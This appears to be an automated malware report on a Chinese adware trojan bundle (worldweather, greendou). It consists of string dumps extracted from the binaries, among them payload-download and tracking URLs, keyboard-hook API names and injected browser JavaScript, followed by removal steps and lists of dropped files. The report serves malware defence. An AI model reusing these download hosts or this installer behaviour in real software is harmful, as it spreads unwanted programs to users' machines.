Content-Type: text/html
Content-Length: 2
Last-Modified: Fri, 21 Mar 2014 05:47:34 GMT
Connection: keep-alive
ETag: "532bd276-2"
Accept-Ranges: bytes
OK..


The Trojan connects to the servers at the following location(s):

%original file name%.exe_1956:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\LOCALS~1\Temp\nsp2.tmp\NSISdl.dll
r.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp
open.ini
tEXtXML:com.adobe.xmp
xmlns:xap="http://ns.adobe.com/xap/1.0/">
xmlns:dc="http://purl.org/dc/elements/1.1/">
Undo=toolbar\16_undo.png
Undo.Hover=toolbar\16_undo2.png
Undo.DrawBackground=1
Favorites=toolbar\16_favorites.png
Favorites.Hover=toolbar\16_favorites2.png
Favorites.DrawBackground=1
Feed.DrawBackground=1
History=toolbar\16_history.png
History.Hover=toolbar\16_history2.png
History.DrawBackground=1
Layout.DrawBackground=1
FontSize.DrawBackground=1
Encoding.DrawBackground=1
Zoom=toolbar\16_page_zoom.png
Zoom.Hover=toolbar\16_page_zoom2.png
Zoom.DrawBackground=1
Proxy.DrawBackground=1
Tools.DrawBackground=1
Plugins.DrawBackground=1
Security.DrawBackground=1
PageContent.DrawBackground=1
Edit=toolbar\16_edit.png
Edit.DrawBackground=1
Save.DrawBackground=1
Options.DrawBackground=1
FormFiller.DrawBackground=1
Screenshot.DrawBackground=1
Page=misc\16_page.png
AddressBar=misc\16_page.png
DefaultTabIcon=misc\16_page.png
Search=toolbar\16_search.png
SearchBar=toolbar\16_search.png
FolderOpen=misc\16_folder_open.png
FolderClose=misc\16_folder_closed.png
FolderClose.hover=misc\16_folder_open.png
WebsiteInfo=misc\16_website_info.png
Go=misc\24_go.png
Go.Hover=misc\24_go2.png
AdHunter=misc\16_ad_hunter.png
_Add=shared\16_new.png
_Edit=shared\16_edit.png
_Search=toolbar\16_search.png
Caption=control\caption.ico
OpenInNew=misc\16_open_in_new.png
ForceTabInBK=misc\16_open_in_bg.png
Caption.Text=#555555
Status.Address.Text=#555555
Toolbar.Normal.Text=#4F7639
Toolbar.Disable.Text=#999999
Toolbar.Gripper.Style=Dashed
Toolbar.Gripper.Width=2
Toolbar.Gripper.Gap=2
Toolbar.Gripper.Percent=90
Toolbar.Gripper.Color=#6281aa
Toolbar.Gripper.ShadowColor=#f8fafd
Toolbar.Separator.Style=Solid
Toolbar.Separator.Width=1
Toolbar.Separator.Percent=90
Toolbar.Separator.Color=#6281aa
Toolbar.Separator.ShadowColor=#f8fafd
Toolbar.Hover.Text=#000066
Toolbar.Hover.Border=#7CA5FA
Toolbar.Hover.Start=#FFFFFF
Toolbar.Hover.End=#C6D8FD
Toolbar.Checked.Text=#000066
Toolbar.Checked.Border=#7CA5FA
Toolbar.Checked.Start=#E7EEFE
Toolbar.Checked.End=#FFFFFF
Toolbar.Pressed.Text=#003399
Toolbar.Pressed.Border=#7CA5FA // Not Impletemented
Toolbar.Pressed.Start=#E7EEFE
Toolbar.Pressed.End=#FFFFFF
Menu.Normal.Text=#444444
Menu.Disable.Text=#999999
Menu.Border=#77a861
Menu.Separator.Style=Solid
Menu.Separator.Width=2
Menu.Separator.Percent=90
Menu.Separator.Color=#77A861
Menu.Separator.ShadowColor=#f8fafd
Menu.Hover.Text=#000066
Menu.Hover.Border=#7CA5FA
Menu.Hover.Start=#FFFFFF
Menu.Hover.End=#C6D8FD
Menu.Checked.Text=#000066
Menu.Checked.Border=#7CA5FA
Menu.Checked.Start=#E7EEFE
Menu.Checked.End=#FFFFFF
Menu.LabelBackground.Start=#ffffff
Menu.LabelBackground.End=#000000
Tab.Normal.Text=#4F7639
Tab.Hover.Text=#4F7639
Tab.Active.Text=#4F7639
ComboBox.Text=#387B2F
//MainPanel.Style=GFill
//MainPanel.Fill.ColorStart=#F6F9FD
//MainPanel.Fill.ColorEnd=#D5E3F7
//MainPanel.Fill.Angle=90
MainPanel.Style=3Image
MainPanel.Image=control\title_bg.png
MainPanel.Image.StartOffset=0
MainPanel.Image.EndOffset=0
MainPanel.Image.Stretch=0
MenuBar.Style=Transparent
Menu.Style=GFill
Menu.Fill.ColorStart=#f6f9fd
Menu.Fill.ColorEnd=#E0F0DC
Menu.Fill.Angle=90
MenuStrip.Style=Transparent
ToolBar.Style=Transparent
WebBar.Style=GFill
WebBar.Fill.ColorStart=#7b7153
WebBar.Fill.ColorEnd=#9b998f
WebBar.Fill.Angle=90
FloatBar.Style=GFill
FloatBar.Fill.ColorStart=#EAF2F9
FloatBar.Fill.ColorEnd=#D5E3F7
FloatBar.Fill.Angle=90
StatusBar.Style=GFill
StatusBar.Fill.ColorStart=#F7F6F5
StatusBar.Fill.ColorEnd=#D5E3F7
StatusBar.Fill.Angle=90
StatusBar.Style=Image
StatusBar.Image=control\status_bar_bg.png
StatusBar.Image.Stretch=1
FindInPageBar.Style=GFill
FindInPageBar.Fill.ColorStart=#F7F6F5
FindInPageBar.Fill.ColorEnd=#D5E3F7
FindInPageBar.Fill.Angle=90
StatusBar.Style=3Image
StatusBar.Image.StartOffset=15
StatusBar.Image.EndOffset=15
StatusBar.Image.Stretch=0
Button.Normal.Style=Transparent
Button.Hover.Style=3Image
Button.Hover.Image=control\Button_Hover.png
Button.Hover.Image.StartOffset=2
Button.Hover.Image.EndOffset=2
Button.Hover.Image.Stretch=1
Button.Pressed.Style=3Image
Button.Pressed.Image=control\Button_Pressed.png
Button.Pressed.Image.StartOffset=2
Button.Pressed.Image.EndOffset=2
Button.Pressed.Image.Stretch=1
Button.Disabled.Style=3Image
Button.Disabled.Image=control\Button_disabled.png
Button.Disabled.Image.StartOffset=2
Button.Disabled.Image.EndOffset=2
Button.Disabled.Image.Stretch=1
Button.Checked.Style=3Image
Button.Checked.Image=control\Button_Checked.png
Button.Checked.Image.StartOffset=2
Button.Checked.Image.EndOffset=2
Button.Checked.Image.Stretch=1
MenuItem.Hover.Style=3Image
MenuItem.Hover.Image=control\MenuItem_Hover.png
MenuItem.Hover.Image.StartOffset=15
MenuItem.Hover.Image.EndOffset=15
MenuItem.Hover.Image.Stretch=1
Tab.Normal.Image=control\tab_inactive.png
Tab.Normal.Image.StartOffset=8
Tab.Normal.Image.EndOffset=8
Tab.Normal.Image.Stretch=1
Tab.Normal.StartOut=2
Tab.Normal.EndOut=0
Tab.Normal.Padding=0 0 2 0
Tab.Hover.Image=control\tab_hover.png
Tab.Hover.Image.StartOffset=8
Tab.Hover.Image.EndOffset=8
Tab.Hover.Image.Stretch=0
Tab.Unread.Image.StartOffset=8
Tab.Unread.Image.EndOffset=8
Tab.Unread.Image.Stretch=1
Tab.Active.Image=control\tab_active.png
Tab.Active.Image.StartOffset=12
Tab.Active.Image.EndOffset=12
Tab.Active.Image.Stretch=0
Tab.Active.StartOut=4
Tab.Active.EndOut=3
Tab.Active.Padding=0 0 2 0
Background.Style=3Image
Background.Image=control\tab_bg.png
Background.Image.StartOffset=4
Background.Image.EndOffset=4
Background.Image.Stretch=1
InactiveBackground.Style=3Image
InactiveBackground.Image.StartOffset=4
InactiveBackground.Image.EndOffset=4
InactiveBackground.Image.Stretch=0
TabProgress.Style=Progress
TabProgress.HideIcon=1
TabProgress.Offset=0 0
TabProgress.Image.FrameWidth=16
TabClose=control\tab_close.png
TabClose.Hover=control\tab_close_hover.png
TabClose.Offset=-6 6
TabClose.ExtendSpace=20
Tab.Normal.Image=control\sidebar_tab_inactive.png
Tab.Normal.Image.StartOffset=10
Tab.Normal.Image.EndOffset=4
Tab.Normal.StartOut=0
Tab.Normal.Padding=0 0 0 4
Tab.Active.Image=control\sidebar_tab_active.png
Tab.Active.Image.StartOffset=14
Tab.Active.Image.EndOffset=4
Tab.Active.StartOut=2
Tab.Active.EndOut=0
Tab.Active.Padding=0 0 0 0
TitleBackground.Style=GFill
TitleBackground.Fill.ColorStart=#E4F2DD
TitleBackground.Fill.ColorEnd=#E0ECD9
TitleBackground.Fill.Angle=90
TabBackground.Style=GFill
TabBackground.Fill.ColorStart=#CCDEC3
TabBackground.Fill.ColorEnd=#D4E3CC
TabBackground.Fill.Angle=90
Background.Normal.Image=control\combo.png
Background.Normal.Image.StartOffset=8
Background.Normal.Image.EndOffset=8
Background.Normal.Image.Stretch=0
Background.Hover.Image=control\combo_hover.png
Background.Hover.Image.StartOffset=8
Background.Hover.Image.EndOffset=8
Background.Hover.Image.Stretch=0
Thumb.Normal.Image=control\combo_dropdown.png
Thumb.Hover.Image=control\combo_dropdown_hover.png
Foreground.Style=3Image
Foreground.Image=control\progress.png
Foreground.Image.StartOffset=2
Foreground.Image.EndOffset=9
Foreground.Image.Stretch=1
Background.Image.StartOffset=2
Background.Image.EndOffset=9
.tci4n
6-3}ij
.vN {
({,{<{*;
nsp2.tmp
0-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8&ini=open.ini&v=1.0.0.0
1.0.0.0
//down.yinyue.fm/open/setup_3128.txt
ns_61.rar
360.ini
c:\%original file name%.exe
%Program Files%\greeou
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
setup_3128.exe
http://down.yinyue.fm/open/setup_3128.txt
y.rR/s
.s%D$
ssshii
qCaae%x
5FF5.ee
M.SZp
x.WXc0
22&2&2&22
;;;2;222
;&2&222;
!771111"""4
"    %|]
( %c]rcddf
8383333
.%&11&&&
fbb%xw
xffbffbb"""%UH
wglffffff"b%UT
f%UTX
}}^]^===
&&.RH
%DGDDtGBcc6fUGGDDDD9
Nullsoft Install System v2.46
%Documents and Settings%\%current user%\Desktop\
http://45y.3baidu.org
1.0.0.0

%original file name%.exe_1956_rwx_10004000_00001000:

callback%d

greendou.exe_2332:

.text
`.rdata
@.data
.rsrc
L$PSSSh,
FtPh>
SSSSh
FtPh
tcPS
F4SSh
t%9X t ;
HSVWh<%U
FTPj
.FG;}
pdh.dll
>1.2.10
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
GetUrlCacheEntryInfoW
FindCloseUrlCache
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WININET.dll
WS2_32.dll
MFC42u.DLL
MSVCRT.dll
_wcmdln
GetWindowsDirectoryW
KERNEL32.dll
GetKeyState
EnumChildWindows
UnregisterHotKey
RegisterHotKey
keybd_event
MapVirtualKeyW
USER32.dll
SetViewportOrgEx
GDI32.dll
RegCloseKey
RegOpenKeyW
RegCreateKeyW
RegDeleteKeyW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileW
urlmon.dll
MSVCP60.dll
VERSION.dll
imagehlp.dll
WINMM.dll
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyNameTextW
MapVirtualKeyExW
GetKeyboardLayout
GetKeyboardState
GetKeyboardLayoutList
GetViewportOrgEx
iie.exe
%y%m%d%H%M%S
http://localhost
http://127.0.0.1
127.0.0.1
favicon.ico
http://
CWebBrowser2
\update.ini
application/x-www-form-urlencoded
HTTPS://
HTTP://
Ryeol HTTP Client Class
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The encoded URL is not valid.
The port number is not valid.
The requested URL is not a valid URL.
.?AVerrmsg_exceptionA@Ryeol@@
.?AVhttpclientexceptionA@Ryeol@@
CHttpEncoderA::_AnsiCharToUtf8Char: szUtf8Char and szAnsiChar can not be NULL.
CHttpEncoderA::UrlEncodeW: szBuff can not be NULL.
.PAVCFileException@@
.PAVCArchiveException@@
.PAVCOleException@@
.PAVCMemoryException@@
GDI32.DLL
RICHED32.DLL
RICHED20.DLL
shlwapi.dll
1.2.10
UXTHEME.DLL
.PAVCException@@
PSAPI.DLL
NULL row buffer for row %ld, pass %d
RICHED20.dll
libpng error: %s
libpng error: %s, offset=%d
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
iTXt chunk not supported.
IE9.IE9NSHandle.1 = s 'IE9NSHandle Class'
CLSID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
IE9.IE9NSHandle = s 'IE9NSHandle Class'
ForceRemove {00B39D47-3331-49a7-B54E-32AE6E993C67} = s 'IE9NSHandle Class'
ProgID = s 'IE9.IE9NSHandle.1'
VersionIndependentProgID = s 'IE9.IE9NSHandle'
val AppID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
'TypeLib' = s '{14264AA3-BB53-4d3a-89DE-05AD67D6D6C6}'
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
Config.dll
Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
durlmon.dll
    %s
    http://www.biso.cc/ld/stat.asp?install
    %s\Common Files\stat.dat
    http://www.biso.cc/ld/stat.php?uninstal
    http://www.biso.cc/ld/stat.asp?open
    Software\Microsoft\WindowsLive
    CommandBars.ini
    start/index.html
    file:///%sprofile/Template/
    \Unblocksite.dat
    webprx
    saveKeyword
    oleaut32.dll
    %d-%s
    https
    http:
    navcancl.htm#
    var i = parseInt(document.body.style.zoom);
    if(isNaN(i))i=100; if(i<0)i=0; if(i==19)i=18; newZoom=i 10 '%'; document.body.style.zoom=newZoom; 
    if(isNaN(i))i=100; if(i<18)i=18; newZoom=i-10 '%'; document.body.style.zoom=newZoom; 
    \/:*?"<>|
    MSWHEEL_ROLLMSG
    RSRC32.dll
    Software\Microsoft\Internet Explorer\TypedUrls
    Software\Microsoft\Windows\CurrentVersion\Internet Settings
    unbock_%d
    block_%d
    blockage.ini
    url_unblock_count
    url_block_count
    key_0
    key_%d
    searchkeys.ini
    shdocvw.dll
    windows-874
    windows-1258
    windows-1257
    windows-1256
    windows-1255
    windows-1254
    windows-1253
    windows-1251
    windows-1250
    www.g-leaf.cn
    %s - %s
    url_%d
    title_%d
    last.ini
    .com.cn
    HOTKEYSET
    .ZIP;.RAR;.EXE
    bosskey
    http://%u.%u.
    http://www.baidu.com/s?wd=%s&tt=
    d:d:d
    .jpeg
    Software\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}
    %download_info
    %download_url
    function cancelError() {return true;} onerror=cancelError;function newpropertychange(){var name = event.propertyName.toLowerCase();var elem = event.srcElement;if( name.indexOf('left')>-1||name.indexOf('top')>-1||name.indexOf('move')>-1){ try{ elem.onpropertychange = null; elem.style.visibility = 'hidden'; elem.srcElement.removeNode(true); }catch(e){} }}function killobj(doc,obj){var objs=doc.document.getElementsByTagName(obj);for (var i=0;i
    Resource\KillFlyAd.htm
    function cancelError() {return true;} onerror=cancelError;var i,len,src,img;len=document.images.length;for(i=0;i
    function cancelError() {return true;} onerror=cancelError;function killTag(tagName){var url;var objs=document.getElementsByTagName(tagName);for(i=0;i
    o%s\profile\SearchEngine\%s
    mskin.ini
    %s%s\%s
    Language\*.dll
    iiedata.exe
    Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\
    Proxy%d_
    proxy.ini
    %d_ico
    %d_title
    profile\SearchEngine\config.ini
    www.daidu.com
    MenuClose.Hover
    MenuMaximum.Hover
    MenuRestore.Hover
    MenuMinimize.Hover
    SkinSelect.Hover
    TabSidebar.Hover
    Search.Hover
    Go.Hover
    Home.Offset
    Home.Hover
    Undo.Offset
    Undo.Disable
    Undo.Hover
    Stop.Offset
    Stop.Hover
    Refresh.Offset
    Refresh.Hover
    HistoryMenu.Offset
    HistoryMenu.Hover
    HistoryMenu.Disable
    Forward.Offset
    Forward.Hover
    Forward.Disable
    Back.Offset
    Back.Hover
    Back.Disable
    SideClose.Hover
    Thumb.Hover.Image
    Thumb.Normal.Image
    Background.Hover.Image
    Background.Normal.Image
    Foreground.Image
    Progress.Image
    StatusBar.Image
    InactiveBackground.Image
    Background.Image
    Split.Hover
    Split.Disable
    TabNew.Hover
    AutoHidePaneBackground.Fill.ColorEnd
    AutoHidePaneBackground.Fill.ColorStart
    BlockBarBackground.Fill.ColorEnd
    BlockBarBackground.Fill.ColorStart
    TreeCtrl.Fill.ColorEnd
    TreeCtrl.Fill.ColorStart
    Tab.InsertSign
    Tab.Active.Text
    Tab.Hover.Text
    Tab.Normal.Text
    ToolBar.Style
    Menu.Border
    Menu.Disable.Text
    Menu.Normal.Text
    Toolbar.Gripper.ShadowColor
    Toolbar.Gripper.Color
    Toolbar.Gripper.Width
    Toolbar.Gripper.Style
    ComboBox.Disable.text
    ComboBox.Text
    Toolbar.Disable.Text
    Toolbar.Normal.Text
    Menu.Separator.ShadowColor
    Menu.Separator.Color
    Menu.Separator.Offset
    Menu.Separator.Width
    MenuItem.Hover.Image
    FavToolBar.Fill.ColorEnd
    FavToolBar.Fill.ColorStart
    FloatBar.Fill.ColorEnd
    FloatBar.Fill.ColorStart
    Menu.Fill.ColorEnd
    Menu.Fill.ColorStart
    Menu.Image
    Menu.Style
    TitleBackground.Fill.ColorEnd
    TitleBackground.Fill.ColorStart
    TitleBackground.Image
    TitleBackground.Style
    Tab.Hover.Image
    Tab.Active.Image
    Tab.Normal.Image
    TabBackground.Fill.ColorEnd
    TabBackground.Fill.ColorStart
    TabBackground.Image
    TabBackground.Style
    Button.Checked.Image
    Button.Pressed.Image
    Button.Hover.Image
    Caption.Text
    MainPanel.Fill.ColorEnd
    MainPanel.Fill.ColorStart
    MainPanel.Image
    MainPanel.Style
    Edit.Height
    CustomFrame.CornerRadius
    CustomFrame.CornerSize
    CustomFrame.Image
    %s.Stretch
    %s.EndOffset
    %s.StartOffset
    %s.ExtendSpace
    %s.Offset
    %s.DrawBackground
    %s.Hover
    \updatelog.txt
    update.exe
    Element '%s' at offset %d not ended
    End tag '%s' at offset %d does not match start tag '%s' at offset %d
    No start tag for end tag '%s' at offset %d
    %s at offset %d unterminated
    Incorrect %s at offset %d
    .The file (%s) aleady exists.
    COMCTL32.DLL
    User32.dll
    user32.dll
    oleacc.dll
    %s-%s
    KeyboardCuesShow
    KeyboardCuesUse
    AlwaysShowFullMenus
    msimg32.dll
    winxp.royale.cjstyles
    royale.msstyles
    winxp.luna.cjstyles
    luna.msstyles
    WindowRectLeftPos
    Right Windows
    Left Windows
    dUxTheme.dll
    Ldwmapi.dll
    CONTEXTTAB%s
    CONTEXTTAB%sCLIENT
    CONTEXTTAB%sGROUPBUTTON
    ContextTab%sHeader
    %Y-%d-%mT%H:%M:%S
    %Y-%d-%m
    %H:%M:%S
    wID=X, cx=%d, fStyle=X
    %i %s
    1&0 %s
    &%i %s
    shell32.dll
    OFFICE2007\SCROLLTHUMBHORIZONTAL.BMP
    OFFICE2007\SCROLLTHUMBVERTICAL.BMP
    OFFICE2007\SCROLLARROWSVERTICALDARK.BMP
    OFFICE2007\SCROLLARROWSVERTICALLIGHT.BMP
    OFFICE2007\SCROLLARROWSHORIZONTALDARK.BMP
    OFFICE2007\SCROLLARROWSHORIZONTALLIGHT.BMP
    OFFICE2007\SCROLLVERTICALDARK.BMP
    OFFICE2007\SCROLLHORIZONTALDARK.BMP
    OFFICE2007\SCROLLVERTICALLIGHT.BMP
    OFFICE2007\SCROLLHORIZONTALLIGHT.BMP
    OFFICE2007\SCROLLARROWGLYPHS.BMP
    WindowsForms
    SHLWAPI.DLL
    USER32.DLL
    KERNEL32.DLL
    FRAMECAPTION%s%i
    0000..\\updata.exe
    (Windows)
    :http://127.0.0.1:80
    &Windows sockets initialization failed.
    !.Icon Files (*.ico)|*.ico|All Files (*.*)|*.*||
    |*.htm;*.html|
    |*.txt|GIF
    |*.gif|JPEG
    |*.jpg;*.jpeg|AU
    |*.au|AIFF
    |*.aif;*.aiff|XBM
    |*.xbm|
    |*.*||!
    (*.txt)|*.txt|
    (*.*)|*.*||
    (*.exe)|*.exe|
    (*.*)|*.*||
    IE.Document
    IE Files (*.htm,*.html)
    Input URL:
    0, 1, 1, 982
    GreenDou1.exe

    worldweather.exe_2288:

    .text
    `.data
    .rsrc
    MSVBVM60.DLL
    %Z%FG2F1
    VB5!6&vb6chs.dll
    CMsgTrans
    GdiplusShutdown
    gdi32.dll
    user32.dll
    %Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
    wininet.dll
    DeleteUrlCacheEntry
    mfc5002.dll
    kernel32.dll
    shell32.dll
    user32.dll
    orldweather5.0.0
    sqliteApi.dll
    Sqlite_QueryCityID
    VBA6.DLL
    [fjbntbpvdqyZgocnvcnvcludmvdnudnucoucoubntcoucoufrx^jpiu{htz_kqdpveqw`lrcou]iofrxhtzdpv`lr`lreqw\hnfrxkw}amscoueqwfrxcoueqwcoudpvbntcoucoucoubntbntcoucoubntbnteqw_kqbntiu{`lrWcihtz
    msgID
    worldweather.exe
    D:\everyday\36
    >cmd=[
    Cfg5002.ini
    worldWeatherRealTime5002.exe
    http://tongji.uujzy.com/tongji.html
    WeatherContext\WeatherContext.db
    http://
    ?5.0.0.5002_id
    ?5.0.0.5002_md
    AQI.5002.exe
    PM25.5002.exe
    PM10.5002.exe
    tongjizxDataby51la>TongjiUrl=
    >port=
    Timer_Timer(0)>10>AlreadyHasExecSplitData
    Timer_Timer(0)>10>tmr45stoExecSplitData
    worldWeatherUpdate.5002.exe
    Timer_Timer(5)>readyto>doactiveExecSplitData
    skins\default\bg_small.png
    skins\default\bg_large.png
    skins\common\loading.png
    http://weather.uujzy.com:8123/tt.php?id=****
    http://sj.tianqi.com/index.php?c=other&a=apppc&id=****
    http://i.tianqi.com/index.php?c=other&a=apppc&id=****
    http://pm25.uujzy.com:8123/data/****.js
    http://www.pm25.in/****
    http://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/
    GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrl,gWeatherUrlBf1=
    GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrlBf2=
    GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrlBf3=
    weatherData.tmp
    \n99.png
    areacode.db
    GetWeatherAQIData>sAQIUrl>
    skins\common\kz.png
    Adodb.Stream
    Microsoft.XMLHTTP
    Pm2.5MK.exe
    needshowpm25data>readyRunExecFile>
    needshowpm25data>notExistExecFile>
    AQIContext\AQIContext.db
    tryToConnectWeatherService>gWeatherPngUrl=
    ConnectWeatherServiceBkInfo>queryifnetactive_Error>tmrtorequerybynexturl>iLoadWeatherFail=
    worldWeatherUpdate.5002.exe.tmp
    >ReadyTimertoTryNextUrl
    cnzz.html
    ConnectWeatherServiceBkInfo>loadweatherData_Fail>tmrtorequerybynexturl>iLoadWeatherFail=
    tryToConnectWeatherService>beginQueryIfReceiveNetStateMsgIn1min
    skins\common\err.png
    updatedata/worldWeatherUpdate.5002.exe
    QueryIfHaveHighVersion>FindNoUpdateUrl>cancel
    debug_main.log
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
    HookMsg>
    UnhookMsg>
    Microsoft Windows NT 4.0
    weather.db
    Sqlite_QueryCityID>
    skins\default\btn_close.jpg
    skins\default\btn_max.jpg
    skins\default\btn_min.jpg
    skins\default\btn_setting.jpg
    skins\default\btn_move.jpg
    .wServicePackMajor:
    .wServicePackMinor:
    .wSuiteMask:
    .wProductType:
    Microsoft Windows 95
    Microsoft Windows 98
    Microsoft Windows Me
    Windows 2000 Data center
    Windows 2000 Advanced
    Windows 2000
    Windows XP Professional
    Windows XP Home
    Windows XP
    Windows Server 2003 Enterprise
    Windows Server 2003 Data center
    Windows Server 2003 Web Edition
    Windows Server 2003 Standard
    Windows Server 2003
    Windows Vista
    Windows Server 2008
    Microsoft Windows 7
    Windows Server 2008 R2
    Microsoft Windows 8
    GetwindowsVersion>
    world.cn
    5.00.5002
    worldweather.exe

    worldWeatherUpdate.5002.exe_3076:

    .text
    `.data
    .rsrc
    MSVBVM60.DLL
    %Z%FG2F1
    webUpdateTS
    SHDocVwCtl.WebBrowser
    VB5!6&vb6chs.dll
    shdocvw.dll
    WebBrowser
    %Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
    kl%Program Files%\Microsoft Visual Studio\VB98\vbc04574.oca
    shell32.dll
    kernel32.dll
    mfc5002.dll
    VBA6.DLL
    sUrl
    MsgID
    MsgHnd
    http:///
    updateContext\update.html
    -----------------------Form_Load>cmdstr=[
    -----------------------Form_Load>ErrCmdstr>unload
    worldweather.exe
    form_load>insHighVersion>cmd=
    worldWeatherUpdate.5002.exe
    form_load>closeLastUpdate>ExecUpdateHighVer>
    Cfg5002.ini
    WeatherContext\WeatherContext.db
    http://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/
    updateContext\HighVerContext.db
    LoadUpdateData>CMD_UPDATE[
    updateContext\un_update.html
    updatehighVerInfo.xml
    HighVerContext.db
    WeatherContext.xml
    WeatherContext.db
    AQIContext.xml
    AQIContext.db
    PM25Context.xml
    PM25Context.db
    PM10Context.xml
    PM10Context.db
    updateContext.xml
    updateContext.db
    updateContext\updateRecord.db
    worldWeatherUpdateTmp.5002.exe
    IfExistsDestfile>UpdateExe>
    uninst.exe
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
    debug_update.log
    .wServicePackMinor:
    AQI.5002.exe
    PM25.5002.exe
    iePm25.exe
    PM10.5002.exe
    worldWeatherRealTime5002.exe
    ifLoadUpdateDataSuccess>MsgID>
    jxqxzmkupdatesj>needReloadNewsExe>
    jxqxzmkupdatesj>needReloadServerExe>
    .wProductType:
    PM10Context\PM10Context.db
    cnzz.html
    AQIContext\AQIContext.db
    PM25Context\PM25Context.db
    updateContext\updateContext.db
    ie.exe
    loadNotExistManagerData>NeedUpateIcoWhenExeLnkType>AddItem>
    .wSuiteMask:
    HookMsg>
    .wServicePackMajor:
    Microsoft Windows NT 4.0
    Microsoft Windows 95
    Microsoft Windows 98
    Microsoft Windows Me
    Windows 2000 Data center
    Windows 2000 Advanced
    Windows 2000
    Windows XP Professional
    Windows XP Home
    Windows XP
    Windows Server 2003 Enterprise
    Windows Server 2003 Data center
    Windows Server 2003 Web Edition
    Windows Server 2003 Standard
    Windows Server 2003
    Windows Vista
    Windows Server 2008
    Microsoft Windows 7
    Windows Server 2008 R2
    Microsoft Windows 8
    GetwindowsVersion>
    world.cn
    5.00.5002


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      worldweather.exe:2288
      worldWeatherUpdate.5002.exe:3076
      365weatherIns_61.exe:456
      greendou.exe:2332
      PM10.5002.exe:2384
      worldWeatherRealTime5002.exe:1344
      mscorsvw.exe:424

    2. Delete the original Trojan file.
    3. Delete or disinfect the following files created/modified by the Trojan:

      %Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
      %Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
      %Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
      %Documents and Settings%\%current user%\Cookies\WXPOEL80.txt (73 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\PM10Context[1].xml (835 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\AQIContext[1].xml (365 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\PM25Context[1].xml (624 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WeatherContext[1].xml (509 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\366[1].ico (16369 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\367.ico.!mv (1177 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\369[1].ico (16369 bytes)
